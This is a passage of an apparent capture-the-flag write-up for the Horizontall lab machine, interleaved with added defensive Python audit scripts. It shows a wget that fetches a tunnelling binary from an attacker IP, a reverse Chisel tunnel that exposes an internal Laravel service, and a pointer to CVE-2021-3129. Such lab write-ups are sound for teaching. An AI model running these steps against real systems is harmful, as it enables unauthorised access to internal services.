Laravel


I initially found out that the 127.0.0.1:8000 socket was up and listening, and PEAS later picked up on it as well.

Since I cannot see processes run by other users due to a lack of privileges, I couldn’t even tell what was occupying that socket. So I decided to connect to it via Netcat and see what it does.

strapi@horizontall:/var/lib$ nc 127.0.0.1 8000 -v
Connection to 127.0.0.1 8000 port [tcp/*] succeeded!
help
id

It wasn’t responsive at all, and the connection was cut off shortly after. Not very helpful.

strapi@horizontall:/var/lib$ curl -s http://127.0.0.1:8000/ -I
HTTP/1.1 200 OK
host: 127.0.0.1:8000
date: Thu, 13 Apr 2023 17:54:50 GMT
connection: close
x-powered-by: PHP/7.4.22
content-type: text/html; charset=UTF-8
cache-control: no-cache, private
date: Thu, 13 Apr 2023 17:54:50 GMT
set-cookie: XSRF-TOKEN=eyJpdiI6ImRuODZvcEl6TDJRTXMrU3R3aHl0VUE9PSIsInZhbHVlIjoiaVZGWGlRSHYyNldoN25KK0lRWWY4Q1JrQ3haY1FQOXdUTGgyRGgvR29NVmRyQU01dnNCYWpiVlRZcGZvRDRkeEpwemJSN2tXSDh3ZDlrZzM1aFNWdXRWZDNtV3NpSFJHbWR0UEM4NzBoVlJLV2Q3cEJQRmpmdW96SGZPdGFvWE4iLCJtYWMiOiIxZGI4M2RkM2NkYTgxNzlmYjY3ZGE5YmEyNDkwYWExY2QwNGZjYWFmYmQ5MDdjMWRkOWVlNmIwMzQ0NjIxNGMxIn0%3D; expires=Thu, 13-Apr-2023 19:54:50 GMT; Max-Age=7200; path=/; samesite=lax
set-cookie: laravel_session=eyJpdiI6InRzczJyTUJNUzZzRS9SajFHMnl1Zmc9PSIsInZhbHVlIjoiU2ZpRVovRkNldHFIWEs2VHdKRWNqVXRIOWw0RUxybEJSK25iQjFJS2tRME8wY1orNmtwdFl5QUJxOHByalkzS1hMTnFHY3J2WGgyRmIyZzRZU3NGOEdGSUViTlQrbnVCMTVxNlZDM2ppOWNQeTBJaHZWTkNDNFI2Nk5mb09xQ08iLCJtYWMiOiI1YTA2ZWE5ZmM5M2JmNmEwMzc3OGI5Y2MyNTdmMjZhYjA2YWI3OTZhY2IyZWEyYjIyZThlNzUyMGQyNjM4MzdjIn0%3D; expires=Thu, 13-Apr-2023 19:54:50 GMT; Max-Age=7200; path=/; httponly; samesite=lax

Connecting to it via curl, however, did return some information about the service. Based on the response headers (the `x-powered-by` header and the `laravel_session` cookie), a Laravel instance seems to be running on the socket.

Laravel is a free and open-source PHP web framework, intended for the development of web applications following the model–view–controller (MVC) architectural pattern and based on Symfony.

Since it doesn’t seem to be proxied through any public-facing web server, I would need to tunnel it to access it.
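Before tunneling, it is worth being systematic about what the headers above give away, because the same headers are what a defender should be auditing on their own services. The following Python script is an added example and is not part of the writeup: it parses a raw HTTP response (the sample is constructed to mirror the shape of the curl -I output above, with the cookie values shortened), fingerprints the framework from the cookie names, and flags the disclosures a hardening review would pick up (version in `x-powered-by`, missing cookie flags, repeated headers).

```python
"""Audit what an HTTP response discloses (added example, not from the writeup)."""
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed sample in the shape of the curl -I output; cookie values shortened.
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
host: 127.0.0.1:8000
date: Thu, 13 Apr 2023 17:54:50 GMT
connection: close
x-powered-by: PHP/7.4.22
content-type: text/html; charset=UTF-8
cache-control: no-cache, private
date: Thu, 13 Apr 2023 17:54:50 GMT
set-cookie: XSRF-TOKEN=eyJpdi...; expires=Thu, 13-Apr-2023 19:54:50 GMT; Max-Age=7200; path=/; samesite=lax
set-cookie: laravel_session=eyJpdi...; expires=Thu, 13-Apr-2023 19:54:50 GMT; Max-Age=7200; path=/; httponly; samesite=lax
"""


def parse_response_headers(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw response into (status line, [(name, value), ...]).
    Names are lower-cased; repeated headers are kept in order."""
    lines = raw.strip().splitlines()
    status = lines[0].strip()
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers


def parse_cookie(value: str) -> Dict[str, str]:
    """Return the cookie name plus its lower-cased attributes from a Set-Cookie value."""
    parts = [p.strip() for p in value.split(";")]
    cookie = {"name": parts[0].split("=", 1)[0]}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        cookie[key.strip().lower()] = val.strip()
    return cookie


def audit_headers(raw: str) -> Dict[str, object]:
    """Fingerprint the stack and list disclosure / cookie-hygiene findings."""
    status, headers = parse_response_headers(raw)
    findings: List[str] = []
    framework = None
    php_version = None

    for name, value in headers:
        if name == "x-powered-by":
            match = re.match(r"PHP/([\d.]+)", value)
            if match:
                php_version = match.group(1)
                findings.append(f"x-powered-by discloses PHP version {php_version}")
        elif name == "set-cookie":
            cookie = parse_cookie(value)
            if cookie["name"] == "laravel_session":
                framework = "Laravel"  # default Laravel session cookie name
            if "secure" not in cookie:
                findings.append(f"cookie {cookie['name']} lacks the Secure flag")
            # The session cookie must be HttpOnly; XSRF-TOKEN is read by JS by design.
            if cookie["name"] == "laravel_session" and "httponly" not in cookie:
                findings.append("laravel_session cookie lacks HttpOnly")

    for name, count in Counter(n for n, _ in headers).items():
        if count > 1 and name != "set-cookie":
            findings.append(f"header '{name}' appears {count} times")

    return {"status": status, "framework": framework,
            "php_version": php_version, "findings": findings}


if __name__ == "__main__":
    for key, val in audit_headers(SAMPLE_RESPONSE).items():
        print(f"{key}: {val}")
```

The Secure-flag finding is expected for a loopback `php artisan serve` listener, but it is exactly what should not survive once the same app sits behind TLS; the script reports it so the reviewer decides rather than the parser.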

Tunneling with Chisel


I will be using Chisel for tunneling.

strapi@horizontall:/dev/shm$ wget -q http://10.10.14.7/chiselx64 ; chmod 755 ./chiselx64

Delivery complete

┌──(kali㉿kali)-[~/archive/htb/labs/horizontall]
└─$ chisel server -p 55555 --reverse
2023/04/13 20:47:26 server: Reverse tunnelling enabled
2023/04/13 20:47:26 server: Fingerprint lWoPqga+rRY3fh7sryZdbfGhQPn9xIABjq6vlcpZpTM=
2023/04/13 20:47:26 server: Listening on http://0.0.0.0:55555

Starting a reverse Chisel server on Kali port 55555.

strapi@horizontall:/dev/shm$ ./chiselx64 client 10.10.14.7:55555 R:800:127.0.0.1:8000
2023/04/13 18:49:52 client: Connecting to ws://10.10.14.7:55555
2023/04/13 18:49:53 client: Connected (Latency 94.068606ms)

From the target system, I tunneled Kali’s port 800 to the target’s local socket, 127.0.0.1:8000.

The connection has been established. I should now be able to access the Laravel instance through Kali’s port 800.

Laravel


Webroot

The footer shows that it’s version 8, using PHP 7.4.18.

Wappalyzer identified the technologies involved. It seems that the web server is just Python’s SimpleHTTP module: SimpleHTTP 0.6, powered by Python 3.10.9. The application itself seems to be written in PHP 7.4.22.

When encountering an instance of Laravel, it’s always good practice to check for the debugging tool available at /profiles.

Debugging


Heading over to /profiles indeed reveals the debugger

The current context seems to be mapped to the /home/developer/myproject/ directory

strapi@horizontall:/home/developer$ ls -l
total 68
-rw-rw----  1 developer developer 58460 May 26  2021 composer-setup.php
drwx------ 12 developer developer  4096 May 26  2021 myproject
-r--r--r--  1 developer developer    33 Apr 13 13:09 user.txt

And it’s right there in the home directory of the developer user. It’s not accessible as the current user.

The Context menu shows the exact version of the Laravel instance: 8.43.0.
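The debugger page leaking the project path and exact framework version is a configuration problem rather than a code bug: Laravel only renders that page when `APP_DEBUG` is enabled, and the framework defaults it to `false` when the key is absent. The Python script below is an added example (not the writeup’s, and not the target’s actual `.env`): it parses a dotenv file with a minimal reader, then flags the weak setting beside the hardened one. The two sample files are constructed, and the `APP_KEY` in the hardened sample is a placeholder, not a real key.

```python
"""Flag Laravel .env settings that expose the debugger (added example, not from the writeup)."""
from typing import Dict, List

# Constructed sample: what a development .env looks like when it reaches a server.
SAMPLE_ENV_DEBUG = """# constructed sample, not the target's file
APP_NAME=myproject
APP_ENV=production
APP_DEBUG=true
APP_KEY=
APP_URL="http://127.0.0.1:8000"
"""

# Constructed sample: the same file with debug off and a key set (placeholder value).
SAMPLE_ENV_HARDENED = """APP_NAME=myproject
APP_ENV=production
APP_DEBUG=false
APP_KEY=base64:PLACEHOLDER_NOT_A_REAL_KEY=
APP_URL="http://127.0.0.1:8000"
"""


def parse_dotenv(text: str) -> Dict[str, str]:
    """Minimal dotenv reader: KEY=VALUE per line, '#' comments, optional 'export ',
    matching surrounding quotes stripped. Enough for auditing, not a full dotenv parser."""
    env: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("export "):
            line = line[len("export "):]
        key, sep, value = line.partition("=")
        if not sep:
            continue
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        env[key.strip()] = value
    return env


def truthy(value: str) -> bool:
    """Values Laravel's (bool) cast on env() treats as enabled, approximately."""
    return value.strip().lower() in ("1", "true", "yes", "on")


def audit_laravel_env(text: str) -> List[str]:
    """Return findings for debug exposure and a missing application key."""
    env = parse_dotenv(text)
    findings: List[str] = []
    app_env = env.get("APP_ENV", "production")      # Laravel's default when unset
    if truthy(env.get("APP_DEBUG", "false")):       # Laravel's default when unset
        if app_env == "production":
            findings.append("APP_DEBUG=true in production: error pages expose stack "
                            "traces, file paths and the framework version")
        else:
            findings.append(f"APP_DEBUG=true with APP_ENV={app_env}: keep this instance "
                            "off untrusted networks")
    if not env.get("APP_KEY"):
        findings.append("APP_KEY is empty: session and cookie encryption is unconfigured")
    return findings


if __name__ == "__main__":
    print("debug sample:", audit_laravel_env(SAMPLE_ENV_DEBUG))
    print("hardened sample:", audit_laravel_env(SAMPLE_ENV_HARDENED))
```

Run it against a deployment’s `.env` (or the rendered `php artisan env` output) as part of a release check; a loopback-only listener like the one on this box is still reachable by any local user, so the `APP_ENV` caveat applies even when the app is never meant to face the network.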

Vulnerability


Top results from a Google search for “Laravel 8.43.0 exploit” reveal a vulnerability: [[Horizontall_Privilege_Escalation#CVE-2021-3129|CVE-2021-3129]]. It seems to be present in Laravel before version 8.4.2, whereas the target instance is running version 8.43.0.

While it seems that the exploit won’t work due to the version difference, I will still [[horizontall_privilege_escalation#cve-2021-3129|give it a shot]], since the exploit targets an internal package that renders the error page, NOT Laravel itself.
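Two things in that reasoning are worth making mechanical, because both trip up patch-management checks: versions have to be compared component by component (a lexical compare of strings like `8.10.0` and `8.4.2` gets the order wrong), and the comparison has to be made against the package that actually contains the bug, not only the framework that depends on it. The script below is an added example, not the writeup’s code: the `8.4.2` fixed-in version is the one the text states for Laravel, the `composer.lock` fragment is constructed in the real file’s shape (a `packages` list of `name`/`version` objects), and the check only models an “affected before X” advisory without a lower bound.

```python
"""Is a locked package version inside an 'affected before X' range? (added example)"""
import json
from typing import Dict, Optional, Tuple

# Constructed composer.lock fragment in the real file's shape; not the target's file.
SAMPLE_COMPOSER_LOCK = json.dumps({
    "packages": [
        {"name": "laravel/framework", "version": "v8.43.0"},
        {"name": "example/other", "version": "1.2.3"},
    ],
    "packages-dev": [],
})


def parse_version(v: str) -> Tuple[int, ...]:
    """'v8.43.0' -> (8, 43, 0): numeric per component, padded to three parts.
    Pre-release and build suffixes ('-beta1', '+meta') are dropped."""
    core = v.strip().lstrip("vV").split("-", 1)[0].split("+", 1)[0]
    parts = [int(p) if p.isdigit() else 0 for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_affected(installed: str, fixed_in: str) -> bool:
    """True when installed < fixed_in, i.e. inside an 'affected before X' range."""
    return parse_version(installed) < parse_version(fixed_in)


def naive_string_compare(installed: str, fixed_in: str) -> bool:
    """The pitfall this example exists to show: lexical order, which ranks
    '8.10.0' below '8.4.2' because '1' < '4'."""
    return installed.lstrip("vV") < fixed_in.lstrip("vV")


def locked_version(composer_lock: str, package: str) -> Optional[str]:
    """Find a package's pinned version in composer.lock (runtime or dev section)."""
    data = json.loads(composer_lock)
    for section in ("packages", "packages-dev"):
        for pkg in data.get(section, []):
            if pkg.get("name") == package:
                return pkg.get("version")
    return None


def check_lock(composer_lock: str, package: str, fixed_in: str) -> Dict[str, object]:
    """Report whether the locked version of `package` is below `fixed_in`.
    A package that is not in the lock file cannot be affected (installed=None)."""
    installed = locked_version(composer_lock, package)
    return {
        "package": package,
        "installed": installed,
        "affected": installed is not None and is_affected(installed, fixed_in),
    }


if __name__ == "__main__":
    # The framework check, as the search result phrases it (constructed lock file).
    print(check_lock(SAMPLE_COMPOSER_LOCK, "laravel/framework", "8.4.2"))
    # The same check must be repeated for the error-page package the author mentions,
    # using that package's own fixed-in version from the advisory.
```

The takeaway for a defender is the second `main` comment: a framework version above the advisory’s threshold says nothing about the bundled error-page package, so the lock file entry for that package is what should be compared, with its own fixed-in version from the advisory.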